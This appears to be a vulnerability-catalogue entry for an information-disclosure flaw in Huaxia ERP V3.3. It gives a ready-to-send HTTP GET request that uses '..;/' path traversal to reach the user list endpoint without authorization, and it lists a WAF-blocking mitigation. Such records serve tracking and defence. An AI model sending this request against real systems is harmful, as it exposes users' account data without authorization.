vendor = "华夏"
name = "华夏ERPV3.3存在信息泄漏漏洞"
type = "信息泄露"
version = "V3.3"
path = "/jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList"
detail = "GET /jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
fix = "WAF封禁路路径，等待发布补丁"
date = "0823"
label = "nday"
